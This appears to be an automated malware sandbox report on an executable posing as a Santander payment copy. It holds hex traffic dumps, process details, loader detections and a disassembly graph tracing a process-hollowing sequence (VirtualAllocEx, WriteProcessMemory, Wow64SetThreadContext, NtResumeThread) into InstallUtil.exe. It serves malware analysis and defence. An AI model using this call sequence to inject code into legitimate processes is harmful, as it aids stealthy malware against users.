                                            2024-12-12 11:35:26 UTC7922INData Raw: e7 56 e3 8a 05 5f 2b b8 c3 4e 61 19 cf 37 6e 32 18 be ac 50 b0 c5 3e 35 ec 9a ec f6 f3 03 a1 ec f1 e0 90 7e d8 f5 a9 9f ea 38 67 22 71 8b 6a c9 c1 a3 ba 1b 4a ca ce ae 06 b3 7f fd 35 a2 a9 15 40 59 e1 92 15 03 36 e9 19 8e fe 27 1a 20 56 69 97 1a 01 bc ff 2c 1a 44 96 4a bf 31 7f 54 7d ad 28 a2 7c 5d 1a 2c ee c0 67 d1 8f 7d d6 9b ac 37 6a 2d 30 6f 75 8c d1 57 78 be 4c e8 c1 ab b0 23 49 e2 f6 98 21 8b 5c 98 9d e4 33 37 d5 33 33 4a 34 c7 5a b3 4f 50 32 b0 c3 47 9e b1 36 43 75 53 1a f8 de 96 9e 30 67 58 f6 6d 8f c4 39 9b ed bd d2 65 f0 4d 18 d1 c5 0c 82 5a 1f 5d 0e 19 7a af 66 4d 55 02 58 14 70 7a 0b 40 a8 98 23 42 b1 67 e2 51 b3 7a 23 64 a6 d3 9b 57 35 14 2d e3 b9 6e ef 6a 5f 77 a1 77 1b 82 ed d5 cf 6b 8e 15 08 80 61 a0 e0 18 19 04 d5 b8 a8 cc cb c2 e7 45 80
                                            Data Ascii: V_+Na7n2P>5~8g"qjJ5@Y6' Vi,DJ1T}(|],g}7j-0ouWxL#I!\3733J4ZOP2G6CuS0gXm9eMZ]zfMUXpz@#BgQz#dW5-nj_wwkaE
                                            2024-12-12 11:35:26 UTC8000INData Raw: 7b 3b 49 98 21 38 b9 12 64 95 51 80 78 98 cb c9 0d 5a b8 e5 5a 7e 0f aa 51 65 b7 84 f4 f7 09 5d 54 16 7f 0e 81 79 81 5f b1 db 9e 91 d0 cb 88 d8 7e fc 4f 5c 1e 00 66 a7 ce 97 f7 12 60 d2 3f f6 9c ac 2f db 3a 67 95 29 34 fc 6f f6 cb 8d 68 24 4e 7c e2 6d 22 e0 40 68 76 7f c5 0d 05 5e 69 5c f9 b8 6e dc 1e f1 db d3 92 bb 8a 9a a6 28 cc e0 69 81 dd 75 2b a6 1f fd a2 18 49 2c 68 65 af e1 93 e5 0f c8 82 66 05 4c 96 e6 5d db bb 2f 8d 11 c1 92 2a ed 2c 76 d9 9f a9 cc 5b b6 94 c0 53 79 a4 49 ae 73 50 f1 49 15 8a c0 3f 95 d3 0c 5b b8 b6 90 70 90 3e 0e b4 88 89 ad 37 9e 92 18 64 3d 28 51 03 fa b2 63 3a b9 18 59 80 0c 14 cd 9f 2f ed 27 05 42 5e 34 33 6b df c5 44 ff f9 c9 15 38 b4 b4 ea 6f fa 73 95 75 94 58 93 9a 65 d4 7a 0d c5 89 fb 19 74 b6 dc c0 01 6c ee 1c 1e 6c b5
                                            Data Ascii: {;I!8dQxZZ~Qe]Ty_~O\f`?/:g)4oh$N|m"@hv^i\n(iu+I,hefL]/*,v[SyIsPI?[p>7d=(Qc:Y/'B^43kD8osuXeztll
                                            2024-12-12 11:35:26 UTC8000INData Raw: 32 17 4e de 6e db bd 37 c8 bf 0a 34 f5 93 98 1f 5e 46 ac 37 9d 82 a7 0c 03 d9 08 ba 9e 24 a3 ec f2 35 42 24 10 e0 8b 71 43 d6 af 3e b0 e4 2b 31 93 84 a4 af 4c 7f 15 f6 b1 ab 42 e9 e9 4d 05 8a a5 d9 a5 2d 0b 3d c2 5b ca 2a 1f 9f 79 8e ce e5 5c 3d fd c5 ee 79 c7 90 c1 88 e4 46 50 f4 80 8f ef 80 6e 8b 6e 0e f9 16 1f 16 24 2a 35 91 bc 9d cb 06 a8 ce 4e c6 14 97 aa 24 02 71 23 80 fd 2f e2 64 05 a5 42 15 f8 f9 b2 ba f1 ac 20 59 0f 72 39 3e 01 16 22 37 1b e9 75 01 55 4a e3 3a 78 57 6b 04 f1 17 c0 41 12 fa bf 93 1d 55 6a 4f 19 e6 76 9b 8c 8a 7d db 44 05 f8 2c fe b2 18 0d e4 5a c8 70 db 9e 93 e1 ed 6d 11 a5 11 af 90 17 7a dc 6d ec 87 ef 9e dd 75 4e 99 28 b9 63 35 02 4e 78 de 64 bb 4f 8a 67 d4 37 9d d4 ea ed a1 85 05 7e 73 08 48 3a 45 de 77 55 ec 36 68 e4 73 ee 02
                                            Data Ascii: 2Nn74^F7$5B$qC>+1LBM-=[*y\=yFPnn$*5N$q#/dB Yr9>"7uUJ:xWkAUjOv}D,ZpmzmuN(c5NxdOg7~sH:EwU6hs
                                            2024-12-12 11:35:26 UTC8000INData Raw: 6f e5 45 6d 47 12 83 70 f4 f4 7a e1 79 27 52 e4 82 7d ed 07 99 21 50 98 fe b8 4c 3c d3 20 72 66 38 61 38 00 de 46 f0 e9 5d 31 c0 14 86 02 b3 c9 c3 de 41 4e 45 9f 62 89 07 cb 04 bc c2 e9 36 32 b3 a8 71 02 70 88 76 e0 5d 4f d6 c6 cc 6f aa 3f ca 0c 94 2d 10 9e 41 f8 e9 39 af 7b 79 f1 dc 1a 93 84 ff 76 92 fb 45 40 9b 2d 57 ce 3a 57 4a 7c 43 5d 83 1f 07 85 18 46 2a 0e 39 a4 78 dd bd 05 e3 25 2c f0 57 72 1f 7c 09 35 7e 5c b4 0d 28 9c 66 9b 71 23 85 8c a2 7e e9 a2 e1 b3 1d 9a a7 70 db 12 79 70 c4 56 46 f0 9c 59 29 d0 12 80 85 89 33 0f b6 9e 1d 5b 72 93 6a 46 3d 50 f1 4b 05 98 9b d1 5d 96 3e 5a 3e 43 b4 86 79 8b 08 1b e4 5e 73 63 93 0e 47 f6 3a f3 c0 69 30 ed 1e dc 48 79 31 e5 12 96 3d 24 d6 29 18 f6 c3 e1 32 54 cf bc 66 4c 99 e7 60 41 51 25 68 25 aa 8b 8a ea ca
                                            Data Ascii: oEmGpzy'R}!PL< rf8a8F]1ANEb62qpv]Oo?-A9{yvE@-W:WJ|C]F*9x%,Wr|5~\(fq#~pypVFY)3[rjF=PK]>Z>Cy^scG:i0Hy1=$)2TfL`AQ%h%
                                            2024-12-12 11:35:26 UTC8000INData Raw: 6e e8 2b 72 80 34 39 ba d2 37 30 49 09 68 a5 9a fd 3f b6 d5 1e 01 75 78 0f 9c 23 5b d0 9a a8 91 68 44 10 13 06 0f ac 9d a2 a8 7f 67 2a 16 e9 c0 51 88 e7 a9 bc 33 32 05 d0 fe 5d 2b 5f ee c5 49 7e e3 56 b0 f7 31 fe 3f 27 cb f7 33 4c 6f 7e a1 6d 58 62 0c 90 54 81 6f 9d 1d 7b e9 20 6a 60 fa 78 cd f9 aa b7 e2 40 51 9b 4b b1 e7 ee e7 27 59 b8 99 58 85 22 ae e0 c2 b5 96 6e fd cb 06 05 b6 57 89 57 ab e5 b4 d5 1c 6a ca 94 12 9c 0e 20 6b 33 03 16 d7 6a 7a 37 3e 06 72 da d7 76 a6 53 42 b6 fb c4 1c 1f 0b 58 c8 05 70 45 42 73 55 ed b4 fd 95 84 7b 6d 3a 0e c7 a6 13 aa a8 b4 84 e9 44 8f 31 12 39 ae 49 b7 90 fa bd c8 b7 91 e7 ed a0 c1 e7 59 48 e3 e6 c4 08 29 f4 80 96 c5 c4 6f e8 81 65 ad 53 45 b8 77 0d 42 e4 fe be b6 6f 45 1b cf 8e 58 eb 4b 98 1e d7 e1 b8 71 e3 44 5d d7
                                            Data Ascii: n+r4970Ih?ux#[hDg*Q32]+_I~V1?'3Lo~mXbTo{ j`x@QK'YX"nWWj k3jz7>rvSBXpEBsU{m:D19IYH)oeSEwBoEXKqD]
                                            2024-12-12 11:35:26 UTC8000INData Raw: de ac b1 cc ff c7 15 c7 b7 de e0 a7 d1 b4 17 c8 9c 55 47 5e eb fa c9 c6 c5 1a ab 24 2e 99 63 8a 5b d5 fb fd 6b ed 66 3d 42 ba ed 32 b7 c0 73 cd 58 7b 47 5a 34 1a 0c 46 25 d2 a7 6f cd 7d 6a 09 1c c0 10 e3 22 11 7d cf ff b4 cf f9 27 68 de fe 02 78 97 4a 16 b6 f9 5d aa 02 1a db 09 9d d7 23 56 c8 6b 14 3f 34 fa 2b e4 ef b7 d8 9f b9 fc 34 10 df 07 3a 6c 50 88 49 90 ce 43 2e ae db a8 f5 6f ac a6 12 4b 14 05 c4 9b 6e e1 4d f2 bc 50 0e 93 f6 48 bf 17 95 b0 6a af 7b 36 50 b8 1c e4 fa 29 2b d2 d3 16 c9 17 6f 33 fa 3e f0 8d 39 89 fb a5 8b a6 aa 7d 85 f2 ed 5e aa 38 05 30 ae cb 5b e4 7b 8f 33 67 3f fc 4d 2a 99 7f 64 0e 60 06 d4 2e 08 81 0e d8 8f 5f a5 48 d5 6e 1d 33 cb fd 59 10 35 db 30 1b 1b fc 67 09 45 fe 4d 76 84 35 54 f9 c4 a3 00 4a a7 b0 08 b9 ab d1 06 b3 18 3c
                                            Data Ascii: UG^$.c[kf=B2sX{GZ4F%o}j"}'hxJ]#Vk?4+4:lPIC.oKnMPHj{6P)+o3>9}^80[{3g?M*d`._Hn3Y50gEMv5TJ<
                                            2024-12-12 11:35:26 UTC8000INData Raw: 8b 22 bf c9 8f 98 20 22 7a 75 40 c9 28 85 dc d4 fc aa 04 ce 85 af 10 25 5d b6 1c 5c 5c 7e 4c 1e b7 b8 be 74 57 fb 8a ae 6a 6b fc 39 fa 13 e8 e0 cc 35 97 77 3d 77 d8 f0 a7 81 99 85 5b 58 60 21 8f 78 e5 f8 91 14 ed b8 ff 19 52 2b a7 ca 48 05 3c c9 dd 03 90 de 93 47 3b 96 8a 2c 8d 64 47 23 72 de 53 0f 4d c5 53 90 ab 1c ba 1e 23 f8 40 f5 35 79 d4 ef 87 4e cc ec 3f 5d 2d 96 5f 0c cf 42 77 6a 23 4d 2e 3a eb ee 08 93 57 8e d3 aa 0f c2 04 9e ee 63 7c af 17 11 0f 9e 66 dd ac 96 51 03 6b 57 4c 08 51 4d a6 b7 c6 38 95 b6 aa af 72 91 dd 2d 87 b3 39 42 3b b8 e9 ae 5f ba 67 4f ea d8 6b 5b aa 1f a9 7c 11 3a 8d f0 3f 8e f8 03 ca 30 f4 40 bb d8 41 77 fd 11 4f 90 25 74 31 59 a0 15 c8 bb 2f 1e ad 0b 86 8a 3e 0d 35 57 73 c9 12 25 3d a9 5e 09 e6 3f f0 8d 6a 26 d6 19 04 2f e9
                                            Data Ascii: " "zu@(%]\\~LtWjk95w=w[X`!xR+H<G;,dG#rSMS#@5yN?]-_Bwj#M.:Wc|fQkWLQM8r-9B;_gOk[|:?0@AwO%t1Y/>5Ws%=^?j&/
                                            2024-12-12 11:35:26 UTC8000INData Raw: 3e fd 3b 44 3f 49 9a a3 19 d1 17 be 50 4d 69 88 c5 b8 47 4d 0f 95 fb 78 12 3e c6 2e 8d 46 0b b2 da b6 a2 66 f0 3c f8 82 c1 5c d6 eb 90 04 d6 99 c4 67 23 c0 77 41 b0 7d 6f 18 05 b9 7b 3e 6c bd fa 2b 01 0f eb 69 f8 e5 a8 e6 a3 d6 56 2e 03 9c 8e fb 29 98 58 1e 12 68 c2 1a bd 42 4e e3 16 d5 2e c9 7f ac a5 b1 6b d7 8a c1 6b 25 a5 0d 0b f6 e7 ab 1e 6a 9b 6c 40 65 e0 48 d0 84 1f 2b 9c 12 64 b4 38 01 84 53 a1 e4 00 f4 49 b8 14 cc 50 9d 06 aa 66 50 18 50 9b bd fb 70 38 64 ae e6 da 82 3f 12 f1 7d a6 c1 d2 1a 68 7d c6 00 27 6f 7f d3 0c d0 e4 69 03 fb 80 65 b3 4f 4c bf fc b6 8a a6 66 9f 45 33 87 a4 ad 3d c3 7b 54 cb 13 4b 79 66 10 81 03 4d 58 89 81 d0 39 85 1f 7d a4 c8 b1 e9 18 f3 5e 65 f5 88 37 99 b6 39 fe 73 c5 da 7f b9 75 38 ea e6 46 60 f8 71 ca a5 da 3f 90 27 db
                                            Data Ascii: >;D?IPMiGMx>.Ff<\g#wA}o{>l+iV.)XhBN.kk%jl@eH+d8SIPfPPp8d?}h}'oieOLfE3={TKyfMX9}^e79su8F`q?'
                                            2024-12-12 11:35:26 UTC8000INData Raw: dc a8 e8 c1 6f 7f fe 77 dc 0a dd 26 f3 10 2b bc 63 72 11 40 78 4d 6f 33 d5 8f 59 a0 57 6a 29 56 aa 30 3b 27 43 dc 5f 84 a9 9c 44 35 fc b4 32 23 15 9d 74 25 be 5e 49 c5 87 25 11 94 12 8e ac 07 fb fb ba 3b 75 e5 41 68 57 86 59 11 f1 ee 05 bb 7d f5 a1 2f 91 d8 89 44 f4 39 77 a8 a8 70 fe 6b 8a 4a d5 e0 f5 10 3a 71 30 53 8c e6 32 45 cd 55 6d 4e 76 76 f1 4e fb b6 86 51 d9 b5 cf 7f b9 26 bb 07 55 35 f5 10 a0 5a f5 11 c7 27 f2 83 ed 34 00 7a 43 ea 25 ac 8b e8 e3 7f e3 83 26 17 7e 8f 59 80 bb 71 69 dc 04 29 92 6e 7f 05 97 de 20 63 51 ad ee bf b4 9b 32 7e b2 10 b7 88 ce bc 7e ba 08 07 05 77 10 3d 9f 9e b7 51 b3 f9 81 75 28 d7 ec 4b da 37 a5 46 8d af cd 21 98 d6 5f 61 e5 f5 81 02 32 92 9b 53 05 5b 9e 81 e9 2f ec b9 e0 01 fc b3 47 d2 57 f7 df 85 0e 93 c3 3f 92 02 71
                                            Data Ascii: ow&+cr@xMo3YWj)V0;'C_D52#t%^I%;uAhWY}/D9wpkJ:q0S2EUmNvvNQ&U5Z'4zC%&~Yqi)n cQ2~~w=Qu(K7F!_a2S[/GW?q
                                            2024-12-12 11:35:26 UTC8000INData Raw: 57 74 22 1d fc d1 30 44 45 5b 3f 3c 08 c7 14 e3 c2 c8 d7 b7 c6 1f 71 6b 85 04 e8 5e b8 13 40 2c 94 bb 09 15 0b 97 2e 18 83 75 5b 45 2a c4 38 42 8a 24 a0 53 43 42 43 9c f2 40 60 64 c5 38 93 53 07 6d 6e c6 f7 20 85 76 72 04 09 c8 29 57 64 a2 73 6e f8 2f 58 72 af 3f 6b cb 07 cd 7e 63 33 8e 15 ba c7 19 24 f4 93 7d 23 dd b4 ae a6 98 15 8b 3e 49 e7 ae 84 17 64 ce 74 fa b3 de 87 de 1e 53 bf 09 b9 3a 2a 57 55 a9 38 f6 72 64 92 29 d3 d3 08 fe 9d e8 21 56 ba 8f b6 8a cb 6c 93 b0 f6 43 d4 03 7c 38 d0 9d 7f 94 bf 09 18 c0 bd 7e 06 d0 ae 28 16 00 7e c2 22 39 4e 62 61 c6 de aa cb 42 01 c8 32 33 49 07 29 6a 77 24 12 82 12 53 80 dc fc 04 94 88 1c 78 5f af 65 54 f6 90 8b 88 5d 90 ae 81 28 66 fb 1a c1 d7 40 82 56 1e f5 b4 4f f1 23 45 5e 7a f8 0c 49 5b e9 b4 0c 58 e2 f5 cf
                                            Data Ascii: Wt"0DE[?<qk^@,.u[E*8B$SCBC@`d8Smn vr)Wdsn/Xr?k~c3$}#>IdtS:*WU8rd)!VlC|8~(~"9NbaB23I)jw$Sx_eT](f@VO#E^zI[X


                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:1
                                            Start time:06:35:09
                                            Start date:12/12/2024
                                            Path:C:\Windows\System32\rundll32.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                            Imagebase:0x7ff747790000
                                            File size:71'680 bytes
                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:5
                                            Start time:06:35:21
                                            Start date:12/12/2024
                                            Path:C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Local\Temp\Temp1_Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zip\Kopia platnosci_Santander_TF1903218545300000564290004.exe"
                                            Imagebase:0xc80000
                                            File size:262'144'000 bytes
                                            MD5 hash:AA24DA375E50F1C1C80C3F3452FD1870
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.1563050163.00000000032D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000005.00000002.1579828371.0000000006ED0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:10
                                            Start time:06:35:49
                                            Start date:12/12/2024
                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                            Imagebase:0x1b0000
                                            File size:42'064 bytes
                                            MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000A.00000002.2416969723.0000000004E20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000A.00000002.2414775317.0000000003621000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 0000000A.00000002.2411189111.0000000002621000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:moderate
                                            Has exited:false

                                            Disassembly

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:7.2%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:6.4%
                                              Total number of Nodes:141
                                              Total number of Limit Nodes:11
                                              execution_graph 24335 5c56de0 24336 5c56df5 24335->24336 24340 5c56e0b 24336->24340 24341 5c57227 24336->24341 24346 5c570fe 24336->24346 24351 5c56efe 24336->24351 24342 5c56e7d 24341->24342 24343 5c56efd 24341->24343 24342->24340 24343->24342 24356 5c583c8 24343->24356 24367 5c583b8 24343->24367 24348 5c56efd 24346->24348 24347 5c56e7d 24347->24340 24348->24347 24349 5c583c8 8 API calls 24348->24349 24350 5c583b8 8 API calls 24348->24350 24349->24347 24350->24347 24352 5c56f08 24351->24352 24354 5c583c8 8 API calls 24352->24354 24355 5c583b8 8 API calls 24352->24355 24353 5c56e7d 24353->24340 24354->24353 24355->24353 24357 5c583dd 24356->24357 24378 5c58674 24357->24378 24382 5c5866a 24357->24382 24386 5c58418 24357->24386 24390 5c58752 24357->24390 24394 5c58582 24357->24394 24398 5c584b0 24357->24398 24402 5c58407 24357->24402 24406 5c589c4 24357->24406 24358 5c583ff 24358->24342 24368 5c583c8 24367->24368 24370 5c58674 8 API calls 24368->24370 24371 5c589c4 8 API calls 24368->24371 24372 5c58407 8 API calls 24368->24372 24373 5c584b0 8 API calls 24368->24373 24374 5c58582 8 API calls 24368->24374 24375 5c58752 8 API calls 24368->24375 24376 5c58418 8 API calls 24368->24376 24377 5c5866a 8 API calls 24368->24377 24369 5c583ff 24369->24342 24370->24369 24371->24369 24372->24369 24373->24369 24374->24369 24375->24369 24376->24369 24377->24369 24379 5c58483 24378->24379 24380 5c5849d 24379->24380 24410 5c58e40 24379->24410 24380->24358 24383 5c58483 24382->24383 24384 5c5849d 24383->24384 24385 5c58e40 8 API calls 24383->24385 24384->24358 24385->24383 24388 5c58445 24386->24388 24387 5c5849d 24387->24358 24388->24387 24389 5c58e40 8 API calls 24388->24389 24389->24388 24391 5c58483 24390->24391 24392 5c5849d 24391->24392 24393 5c58e40 8 API calls 24391->24393 24392->24358 24393->24391 24396 5c58483 24394->24396 24395 5c5849d 24395->24358 24396->24395 24397 5c58e40 8 API calls 24396->24397 24397->24396 24400 5c58483 24398->24400 24399 5c5849d 24399->24358 24400->24399 24401 5c58e40 8 API calls 24400->24401 24401->24400 24404 5c58418 24402->24404 24403 5c5849d 24403->24358 24404->24403 24405 5c58e40 8 API calls 24404->24405 24405->24404 24407 5c58483 24406->24407 24408 5c5849d 24407->24408 24409 5c58e40 8 API calls 24407->24409 24408->24358 24409->24407 24411 5c58e65 24410->24411 24418 5c58e87 24411->24418 24424 5c5946e 24411->24424 24429 5c59063 24411->24429 24434 5c59761 24411->24434 24439 5c59387 24411->24439 24444 5c59325 24411->24444 24449 5c5917a 24411->24449 24454 5c5985f 24411->24454 24459 5c59f3c 24411->24459 24464 5c59d53 24411->24464 24470 5c59c97 24411->24470 24476 5c58feb 24411->24476 24418->24379 24425 5c5947d 24424->24425 24482 5dc0d09 24425->24482 24486 5dc0d10 24425->24486 24426 5c58f8d 24430 5c5906d 24429->24430 24490 5dc1398 24430->24490 24494 5dc1391 24430->24494 24431 5c590c5 24435 5c59770 24434->24435 24498 5dc0478 24435->24498 24502 5dc0471 24435->24502 24436 5c5979c 24440 5c59391 24439->24440 24506 5dc0a69 24440->24506 24510 5dc0a70 24440->24510 24441 5c58f8d 24445 5c59332 24444->24445 24447 5dc0a69 VirtualAllocEx 24445->24447 24448 5dc0a70 VirtualAllocEx 24445->24448 24446 5c59665 24447->24446 24448->24446 24450 5c5918e 24449->24450 24452 5dc0d09 WriteProcessMemory 24450->24452 24453 5dc0d10 WriteProcessMemory 24450->24453 24451 5c59232 24451->24418 24452->24451 24453->24451 24455 5c59867 24454->24455 24457 5dc0478 Wow64SetThreadContext 24455->24457 24458 5dc0471 Wow64SetThreadContext 24455->24458 24456 5c5989e 24456->24418 24457->24456 24458->24456 24460 5c59f4b 24459->24460 24462 5dc0d09 WriteProcessMemory 24460->24462 24463 5dc0d10 WriteProcessMemory 24460->24463 24461 5c58f8d 24462->24461 24463->24461 24465 5c59d60 24464->24465 24466 5c59089 24464->24466 24468 5dc1398 NtResumeThread 24466->24468 24469 5dc1391 NtResumeThread 24466->24469 24467 5c590c5 24468->24467 24469->24467 24471 5c59ca1 24470->24471 24472 5c59387 24470->24472 24474 5dc0a69 VirtualAllocEx 24472->24474 24475 5dc0a70 VirtualAllocEx 24472->24475 24473 5c58f8d 24474->24473 24475->24473 24477 5c59862 24476->24477 24478 5c58f8d 24476->24478 24480 5dc0478 Wow64SetThreadContext 24477->24480 24481 5dc0471 Wow64SetThreadContext 24477->24481 24479 5c5989e 24479->24418 24480->24479 24481->24479 24483 5dc0d10 WriteProcessMemory 24482->24483 24485 5dc0daf 24483->24485 24485->24426 24487 5dc0d58 WriteProcessMemory 24486->24487 24489 5dc0daf 24487->24489 24489->24426 24491 5dc13e0 NtResumeThread 24490->24491 24493 5dc1415 24491->24493 24493->24431 24495 5dc1398 NtResumeThread 24494->24495 24497 5dc1415 24495->24497 24497->24431 24499 5dc04bd Wow64SetThreadContext 24498->24499 24501 5dc0505 24499->24501 24501->24436 24503 5dc0478 Wow64SetThreadContext 24502->24503 24505 5dc0505 24503->24505 24505->24436 24507 5dc0a70 VirtualAllocEx 24506->24507 24509 5dc0aed 24507->24509 24509->24441 24511 5dc0ab0 VirtualAllocEx 24510->24511 24513 5dc0aed 24511->24513 24513->24441 24331 5c5fd88 24332 5c5fdd6 NtProtectVirtualMemory 24331->24332 24334 5c5fe20 24332->24334

                                              Executed Functions

                                              Function 05C5C890 Relevance: 1.9, Strings: 1, Instructions: 617COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 37 5c5c890-5c5c8b1 38 5c5c8b3 37->38 39 5c5c8b8-5c5c942 37->39 38->39 132 5c5c948 call 5c5d400 39->132 133 5c5c948 call 5c5d3f0 39->133 44 5c5c94e-5c5c99b 47 5c5c99d-5c5c9a8 44->47 48 5c5c9aa 44->48 49 5c5c9b4-5c5cacf 47->49 48->49 60 5c5cae1-5c5cb0c 49->60 61 5c5cad1-5c5cad7 49->61 62 5c5d2d2-5c5d2ee 60->62 61->60 63 5c5d2f4-5c5d30f 62->63 64 5c5cb11-5c5cc74 call 5c5b3e0 62->64 75 5c5cc86-5c5cdd4 call 5c58cf8 call 5c58b38 64->75 76 5c5cc76-5c5cc7c 64->76 87 5c5cdd9-5c5ce15 75->87 76->75 88 5c5ce17-5c5ce1b 87->88 89 5c5ce7a-5c5ce84 87->89 91 5c5ce23-5c5ce75 88->91 92 5c5ce1d-5c5ce1e 88->92 90 5c5d0ab-5c5d0ca 89->90 94 5c5d0d0-5c5d0fa 90->94 95 5c5ce89-5c5cfcf call 5c5b3e0 90->95 93 5c5d150-5c5d1bb 91->93 92->93 112 5c5d1cd-5c5d218 93->112 113 5c5d1bd-5c5d1c3 93->113 101 5c5d14d-5c5d14e 94->101 102 5c5d0fc-5c5d14a 94->102 124 5c5cfd5-5c5d0a1 call 5c5b3e0 95->124 125 5c5d0a4-5c5d0a5 95->125 101->93 102->101 114 5c5d2b7-5c5d2cf 112->114 115 5c5d21e-5c5d2b6 112->115 113->112 114->62 115->114 124->125 125->90 132->44 133->44
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1576594089.0000000005C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_5c50000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 8
                                              • API String ID: 0-4194326291
                                              • Opcode ID: a15f0f9c94dceb6bb8864179eb299aa86fcbe6568820be770fd5db4e2f02604b
                                              • Instruction ID: b056c06d446d7f98d414c98bc38e5bcc48763f3a65dbe0ca8dabe4e595540143
                                              • Opcode Fuzzy Hash: a15f0f9c94dceb6bb8864179eb299aa86fcbe6568820be770fd5db4e2f02604b
                                              • Instruction Fuzzy Hash: E752F474E002298FDB64DF68D844AD9B7B2FB89310F1086AAD90DA7355DB34AEC5CF50
                                              Function 05C5FD81 Relevance: 1.6, APIs: 1, Instructions: 65nativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 155 5c5fd81-5c5fe1e NtProtectVirtualMemory 159 5c5fe27-5c5fe4c 155->159 160 5c5fe20-5c5fe26 155->160 160->159
                                              APIs
                                              • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05C5FE11
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1576594089.0000000005C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_5c50000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID: MemoryProtectVirtual
                                              • String ID:
                                              • API String ID: 2706961497-0
                                              • Opcode ID: f8cdae0c3ebac4e1ba19751b867d067b6bd8e91db086525d5894526a820b2b42
                                              • Instruction ID: 270328e0c64127d0ce7d71d8eab3774048220d289a5395a78fb65d368b0b473b
                                              • Opcode Fuzzy Hash: f8cdae0c3ebac4e1ba19751b867d067b6bd8e91db086525d5894526a820b2b42
                                              • Instruction Fuzzy Hash: FB2113B5D013499FDB10DFAAD980A9EBBF5FF48310F20842AE519A7240D775A904CBA4
                                              Function 05C5FD88 Relevance: 1.6, APIs: 1, Instructions: 63nativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 175 5c5fd88-5c5fe1e NtProtectVirtualMemory 178 5c5fe27-5c5fe4c 175->178 179 5c5fe20-5c5fe26 175->179 179->178
                                              APIs
                                              • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05C5FE11
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1576594089.0000000005C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C50000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_5c50000_Kopia platnosci_Santander_TF1903218545300000564290004.jbxd
                                              Similarity
                                              • API ID: MemoryProtectVirtual
                                              • String ID:
                                              • API String ID: 2706961497-0
                                              • Opcode ID: d1c8aa3332db59c182e91f50f2f3e2be694a12fe85a661134868db774c3f79d4
                                              • Instruction ID: 47b2b265a6f0c70048d5a95642d5e906a3fbaac2d5caeda153ff5b6bf8011ecf
                                              • Opcode Fuzzy Hash: d1c8aa3332db59c182e91f50f2f3e2be694a12fe85a661134868db774c3f79d4
                                              • Instruction Fuzzy Hash: BD2122B5D003499FDB10CFAAD880A9EFBF5FF48310F20882EE419A7240C7759900CBA4
                                              Function 05DC1391 Relevance: 1.6, APIs: 1, Instructions: 56nativethreadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 193 5dc1391-5dc1413 NtResumeThread 197 5dc141c-5dc1441 193->197 198 5dc1415-5dc141b 193->198 198->197
                                              APIs
                                              • NtResumeThread.NTDLL(?,?), ref: 05DC1406
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.1577009882.0000000005DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
